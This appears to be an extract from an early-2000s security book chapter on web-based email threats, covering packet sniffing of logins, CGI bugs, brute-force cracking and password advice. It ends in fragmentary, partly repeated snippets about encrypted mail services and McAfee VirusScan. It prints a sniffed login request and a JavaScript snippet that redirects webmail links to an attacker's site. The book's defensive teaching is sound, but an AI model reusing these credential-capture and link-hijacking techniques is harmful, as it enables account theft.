128 Chapter 4 • Web-based Mail Issues POST /config/login?5o0hflhv037e5 HTTP/1.1 Accept: image/gif, image/jpeg. image/pjeg, application/vnf.ms-powerpoint, */* Referer:http://login.yahoo.com/config/mail?.intl=us&.lg=us Accept- Language:en-us Content-Type: application/x-www-form-urlencoded Accept- Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible: MSIE 5.0; Windows 98; DigExt) Host:login.yahoo.com content- Length:102 Connection: Keep- Alive….tries=&.src=ym&.last=&promo=&.intl=us&bypass=&. partner=&.chkP=Y&.done=&login=marfino&passwd=password The last portion of this packet clearly states the user name and pass- word earlier mentioned as login = marfino and password = password. Once a malicous user obtains this information, he or she can then log into your Web e-mail server with impunity. Most hackers who have been able to do this simply read the e-mail messages, rather than deleting them or con- ducting noticeable mischief. This is because most hackers are interested in gaining information over a long period of time; if a hacker were to delete an e-mail message, he or she would leave signs of tampering. It is likely that many e-mail accounts are actually compromised—the victim simply doesn’t know about it. Case Study Some of America Online configurations are subject to sniffing attacks. A sniffer is a program that monitors and analyzes network traffic. It is designed to detect bottlenecks and problems on the network. Using this information, a network manager can keep traffic flowing efficiently. There are many different commercial sniffing products available on the market, such Network Associate’s Sniffer Basic, or the UNIX tool TCPdump. As you might remember, a sniffer can also be used to capture data being transmitted on a network, much like wire tapping a phone. A sniffing attack is when a sniffer is used to capture the data in transit, data such as passwords during login and e-mails once they are sent. The following figures illustrate the use of Network Associate’s Sniffer Basic to monitor an e-mail being sent using America Online (see Figure 4.6). The e-mail is created in America Online version 5.0; the workstation is connected to the Internet over a cable modem. Once the user hits the Send now button, about 11 packets get sent. This sniffer basic is set on the user’s workstation capturing all incoming and outgoing traffic. Figure 4.7 shows the first packet. www.syngress.com www.syngress.com 119_email_04 10/6/00 1:17 AM Page 128 Web-based Mail Issues • Chapter 4 129 The first packet has the first 34 characters of the body of the e-mail. The second packet (see Figure 4.8) has the rest of the body of the message: “Make sure no one else sees this!” The last packet (see Figure 4.9) has both the subject and to whom the e-mail is being sent: marfino@yahoo.com, and shows this is an e-mail sent from AOL. www.syngress.com Figure 4.6 The original message to be sniffed. Figure 4.7 The first packet being sniffed. 119_email_04 10/6/00 1:17 AM Page 129 130 Chapter 4 • Web-based Mail Issues Not only does this data get transmitted when monitoring the user’s work- station, it can also be discovered on every router on the way to the desti- nation. www.syngress.com www.syngress.com Figure 4.8 The second packet being sniffed. Figure 4.9 The last packet being sniffed. 119_email_04 10/6/00 1:17 AM Page 130 Web-based Mail Issues • Chapter 4 131 Specific Sniffer Applications Applications such as SessionWall (www.sessionwall.com), Ethereal (www.ethereal.com) and spynet (packetstorm.securify.com) can sniff packets, then actually reassemble the entire TCP session. As a result, a user can sniff the individual packets in a connection, then provide you with an identical copy of the e-mail message. If a malicious user is able to position himself between you and the destination computer, then he will be able to read your e-mail. For example, Figure 4.10 shows a packet capture from Ethereal, which is usually run on Linux and UNIX systems. Specifically, Figure 4.10 shows that someone has captured a series of TCP transmissions. Specifically, an e-mail message is being sent from port 25 of the machine with the IP address of 10.100.100.50 to the receiving port of 1035 of the machine with the IP address of 10.100.100.60. Port 25, as you may remember, is the standard SMTP port, which does nothing but send messages. In this case, Sendmail has sent a message to machine 10.100.100.60. If a malicious user wished to, he could sift through each of these individual packets and obtain information from it. However, Figure 4.11 shows a rather convenient little feature provided by Ethereal. By selecting the Follow TCP Stream option, any user can see a completely reassembled series of packets. As you can see, Ethereal reconstitutes the entire SMTP session. The same technique applies to POP3 sessions, as well. Figure 4.12 shows how it is possible to reconstitute an entire POP3 session. www.syngress.com Figure 4.10 An SMTP session captured in Ethereal. 119_email_04 10/6/00 1:17 AM Page 131 132 Chapter 4 • Web-based Mail Issues Although the password on this message has been encrypted, the encryption scheme is very weak, and can be subjected to a dictionary attack. You can learn more about Ethereal at www.ethereal.com. NOTE Applications such as Ethereal are not inherently illicit. They are tools, just like any other software application. In fact, Ethereal is fast becoming a standard packet sniffer for systems administrators who use Linux systems to monitor networks and serve up Web pages. www.syngress.com www.syngress.com Figure 4.11 The results of the Follow TCP Stream option in Ethereal. Figure 4.12 Sniffing an unencrypted Web-based POP3 session. 119_email_04 10/6/00 1:17 AM Page 132 Web-based Mail Issues • Chapter 4 133 Code-based Attacks Thus far, you have learned about denial of service and sniffing attacks, both of which are not unique to Web-based e-mail servers. Perhaps the most unique threat to Web-based e-mail servers is due to their reliance upon Common Gateway Interface (CGI) scripts in order to provide e-mail services. A CGI script is really nothing more than a mini application that exe- cutes on the server. When, for example, you create an account on Netscape’s Webmail server, chances are that this one activity actually involves several powerful CGI scripts that accomplish at least the following tasks: 1. Adding contact information to a database so that the information can be sold to a third party, or so that the company can use this information to authenticate a user who has lost his password and wishes to re-learn it. 2. Creating an account in the system’s POP3 user database. 3. Creating a small directory that will act as the inbox for the user. 4. Sending an e-mail message to the inbox, welcoming the new user. It is possible that many additional functions and scripts will be neces- sary to simply create the account. Now, consider how many other CGI scripts are necessary to enable login, changing of passwords, and so forth. A CGI script can be written in almost any language. Common CGI lan- guages include: ■ Perl ■ Active Server Pages, using VBScript ■ JavaScript ■ Java ■ PHP: Hypertext Preprocessor Regardless of what is used, it is often very difficult to create powerful server-side scripts that do their job, yet do not open up security problems. Because CGI scripts are mini applications that execute on the server without anyone watching them, it is possible to redirect this execution and open up a security hole. www.syngress.com 119_email_04 10/6/00 1:17 AM Page 133 134 Chapter 4 • Web-based Mail Issues The PHF Bug Several years ago, the Solaris operating system, which is a flavor of UNIX, used a sample script named PHF. This script was placed into the CGI-BIN, which is a special directory that allows the execution of CGI scripts. The problem with the PHF code is that it was very easy for a malicious user to obtain the password file for the server. It was so easy, in fact, that if the PHF application was installed, the user name and password informa- tion would appear on the user’s browser. All the user would have to do is copy the information, then run a cracking program against it. The PHF bug is no longer a real threat, because most hackers and sys- tems administrators already know about it. However, in 1996, it was all the rage: As late as 1998, the United States White House e-mail server was attacked by a user who exploited this bug. Due to the rather complex nature of CGI, many additional CGI scripts exist that can open similar security holes. In fact, most hacker sites are full of specialized applications called CGI scanners, which are specially designed to find and exploit problem CGI scripts. Another reason why CGI scripts can cause problems is because they are often vulnerable to buffer overflows. As you might remember from Chapter 1, a buffer overflow occurs when information is not checked when it is passed between variables in an application. If the information that is passed between variables is too large for the receiving variable, it is pos- sible for the application that contains these problem variables to crash. Many rather interesting things can happen during a buffer overflow, not the least of which is that the system can simply open itself up to any user to take over full administrative access to the system. This is precisely what happened with the CMail 2.3 Web e-mail server. It contains a buffer overflow that can lead to a denial of service attack, or to compromise of the system. You can download a newer version of CMail at many sites, including http://chicago.supersharewareman.com/Apps/ 779.asp. Avoiding Buffer Overflows The problem with buffer overflows is that the only way you can solve them is by upgrading to the latest, stable version of the software application. Do not make the mistake of thinking that the latest version is always the most stable. This is often not the case; many times, the latest version actually introduces instabilities that a malicious user can exploit. Unless you create your own software, you are pretty much forced into trusting the people who write the software you use. The best way to guard against these problems is to keep current about the software. You can: www.syngress.com www.syngress.com 119_email_04 10/6/00 1:17 AM Page 134 Web-based Mail Issues • Chapter 4 135 ■ Regularly visit the Web site of the company that has the software you are using for the latest advisories and updates. ■ Visit the www.cert.org Web site and search for advisories con- cerning your software. ■ Visit well-known software sites, such as www.freshmeat.com, as well as hacker sites, such as www.securityfocus.com and www.ntbugtraq.com. Hostile Code Because Web-based e-mail accounts must be accessed by a Web browser, most hackers immediately target the most current browsers being used. As of this writing, these are Internet Explorer 5 and Netscape 6. When IE 4.0 and Netscape 3.0 were popular, many malicious users discovered that any client who used the e-mail clients that came with these browsers to receive their e-mail were vulnerable to embedded code in the e-mail messages they read. The following code, written in JavaScript, allowed a malicious user to log in to anyone’s account: Hotmail flaw. (second version) errurl=”http://http://www.because-we- can.com/hotmail/default.htm”; nomenulinks=top.submenu.document.links.length; for(i=0;i<nomenulinks- 1;i++) { top.submenu.document.links[i].target=”work”; top.submenu.document.links[i].href=errurl; } noworklinks=top.work.document.links.length; for(i=0;i<noworklinks-1;i++) { top.work.document.links[i].target=”work”; top.work.document.links[i].href=errurl; } Taking Advantage of System Trusts Many additional attacks exist, most of which are not documented, mainly because most hackers wish to keep their little tricks as secret as possible. Another reason why Web-based e-mail servers such as Hotmail are vulner- able to attacks is because the servers are always willing to trust any input generated by the browser of a user who has logged in. As long as a user is logged in, the CGI scripts server tends to assume that all input is benign, if not helpful. This is not always the case. A mali- cious user can send an HTML-enabled message that contains embedded code that can: www.syngress.com 119_email_04 10/6/00 1:17 AM Page 135 136 Chapter 4 • Web-based Mail Issues ■ Change the legitimate user’s password to one known by the mali- cious user. The malicious user can then log in to read and send mail under the legitimate user’s name. ■ Present a fake dialog box meant to trick an unwitting user into entering his login information, which is then immediately e-mailed to the malicious user. Most of these techniques work only if the user is currently logged in. Still, this is almost always the case when a user is checking e-mail. Even though such threats are almost immediately corrected as soon as are made public, using such services to store sensitive information and passwords can place you and your associates at risk. Solving the Problem of System Trusts One of the best ways to solve this problem is to disable HTML-based e-mail and active scripting, as it is called in Windows Explorer, on your e-mail client. Cracking the Account with a “Brute Force” or Dictionary Application A hacker is not limited to sending malicious code. Many applications exist that repeatedly try to log in to a server using as many user name and pass- word combinations as possible. This practice is often called a brute force attack, because it is a rather unsophisticated attempt to find a password. A slightly more sophisticated attack involves the use of a simple text file that contains thousands and thousands of words and names that you might find in a dictionary. These words can be in various languages. Password-cracking applications such as Munga Bunga are especially popular among hackers who attack Hotmail and Yahoo!. Munga Bunga will not crack a user’s password every time—worthwhile hacking is never that easy. However, most people pick passwords that would be incorporated in a password-cracking program’s dictionary file, and this form of attack is often successful. Solving Cracking Attacks in Web-based E-mail Servers The chief solution would be to invoke controls on the server that lock out an account when it is being bombarded with failed requests. Unfortu- nately, this is not possible with large, public Web e-mail servers such as Yahoo! and Netscape; users want the convenience of being able to log in, and applying such security measures will likely drive people away. Additionally, invoking such security measures can consume a great deal of time. Because most of these services are free, it is highly unlikely that many companies will be diligent about protecting their services in this way. www.syngress.com www.syngress.com 119_email_04 10/6/00 1:17 AM Page 136 Web-based Mail Issues • Chapter 4 137 As an end user, the best way to thwart such attacks is to change your password often, and ensure that it is not one that could be found in a dic- tionary. Whenever possible, use non-standard characters such as those shown in Table 4.1. Table 4.1 Non-standard Characters To Use in E-mail Passwords ~! `@ %^ $( )? >< You should then make the password as long as possible (at least six letters). Then, use a combination of lower and uppercase letters. In spite of all this, try to make the password fairly easy to remember. One way to do this is to take a recognizable word, then substitute several characters in order to make it memorable to only you. You can substitute numbers and non-printable characters for letters. For example, the word popcorn can become )O-c($n. In this example, the letter p is substituted with ), because it is the nearest special character to the “p” key. The capital letter “O” is fairly self-explanatory. The - character is a substitution for “p,” because it, too, is close to the letter p. Finally, the $ sign is near the “r” on the key- board, and “n” is left as is. You will, of course, have to come up with a system that suits you. Finally, make sure that you change your passwords often. This way, even if someone obtains your password, they will have access for only so long (assuming that they aren’t simply able to sniff your password). Physical Attacks Never assume that a malicious user is always someone who lives far away from you. It is possible that a malicious user has physical access to your system. If this is the case, a hacker can use a keylogger program. A key- logger program allows a user to track users key strokes on their system. The application silently listens in the background and records all keystrokes to a plaintext file, or to a remote system, where the malicious user is watching. Anything you type onto the screen can be read. In order to implement a keylogger, a malicious user must have access to the target user’s system. This may not be as difficult as it seems: How many people really take the time to implement screensaver passwords, or www.syngress.com 119_email_04 10/6/00 1:17 AM Page 137 [...]... then gets decoded once received by the recipient Practical Implementations HushMail, available at www.hushmail.com, was the first commercially available Web e- mail service to offer encrypted login, as well as encrypted e- mail messages The HushMail site is shown in Figure 4. 13 Figure 4. 13 The HushMail home page www.syngress.com www.syngress.com 119_email_ 04 10/6/00 1:17 AM Page 141 Web-based Mail Issues... www.zeroknowledge.com www.syngress.com www.syngress.com 119_email_ 04 10/6/00 1:17 AM Page 143 Web-based Mail Issues • Chapter 4 143 Figure 4. 15 The Zeroknowledge home page Zeroknowledge software is quite powerful, and is suitable for businesses that wish to further secure communications between each other over public networks Summary It would be a mistake to completely avoid Web-based e- mail servers Likewise,... checked earlier The first one is SecureCast Online (ECEngine.exe, which will call MUpdate.exe), to update the VirusScan DAT files Before this is done, you will be prompted to register the VirusScan license The second wizard is the Emergency Disk Creation Wizard (Edisk32.exe) The wizard prompts you for the way you want the diskette to be formatted and gives you three options (see Figure 5.2) If the drives... Check the fileserver for newer DAT files 2 If there are newer DAT files go to step 3; otherwise go to step 7 3 Disable the VirusScan programs (Vshwin32.exe, Avconsol.exe Vsstat.exe, Alogserv.exe, and Webscanx.exe) 4 Move the old DAT files to a Save directory 5 Copy the new DAT files from the fileserver 6 Enable the VirusScan programs 7 End Table 5.3 Registry Locations for McAfee VirusScan Utilities Utility... the MAPI interface, so the mail folders on the mail server can be checked Actually, this doesn’t even require a MAPI-based e- mail- client, because it can directly hook into the interface Only the client is used to set up the connection with the mail server and the proper account, and triggers the scanning program to be activated Before the user opens an e- mail, the body and all attachments will be scanned... File/Registry McAfee VirusScan Scheduler Avconsol.ini (in VirusScan directory) Default.vsh Default.vsc HKEY-1\ScreenScan HKEY-2 \McAfee VirusScan\ Exchange Scan HKEY-2 \McAfee VirusScan\ VirusScan 2000 McAfee Vshield McAfee VirusScan (scan32) McAfee ScreenScan McAfee E- mail Scan for Exchange client McAfee VirusScan Central In networked environments, not only should you secure the configuration of VirusScan,... files, and always follow them to the letter After the test phase, the new definition files need to be deployed If you manage a fully automated environment, deployment is easy Or you can write your own script (as described in the sidebar, “The Security of VirusScan 5”) However, if you have to manage a lot of notebooks, you need to encourage the users to perform the update of the definition files themselves... up-to-date and virus- free copy of that file in the Safe & Sound file Safe & Sound has every reason to be used because it’s delivered at no extra charge as part of VirusScan If the option for Safe & Sound has been chosen, its wizard (retake.exe) will start after the Emergency Disk has been created As the Safe & Sound wizard finishes, the PC has to be rebooted, thereby completing the installation of VirusScan... mentioning here When installed, it can make backups, in the background, of complete drives, or the drive structure and files of a selected type/extension Periodically all files and data are written to a safe and virus- free file (called a protected volume file) that is accessed like a separate drive (and is mounted during the startup of the PC) While the file is mounted, it’s inaccessible to viruses The... POP3-based e- mail clients, you also need to enable the scanning of files that are downloaded from the Internet If you scan all files from the Internet, the chance of your system getting infected with viruses is greatly reduced The drawback is that it takes time, slowing down the effective speed of the Internet connection, unless you have a Pentium III 600Mhz system with at least an Integrated Services Digital . the e- mail. The second packet (see Figure 4. 8) has the rest of the body of the message: “Make sure no one else sees this!” The last packet (see Figure 4. 9) has both the subject and to whom the e- mail. a rather convenient little feature provided by Ethereal. By selecting the Follow TCP Stream option, any user can see a completely reassembled series of packets. As you can see, Ethereal reconstitutes. IE 4. 0 and Netscape 3.0 were popular, many malicious users discovered that any client who used the e- mail clients that came with these browsers to receive their e- mail were vulnerable to embedded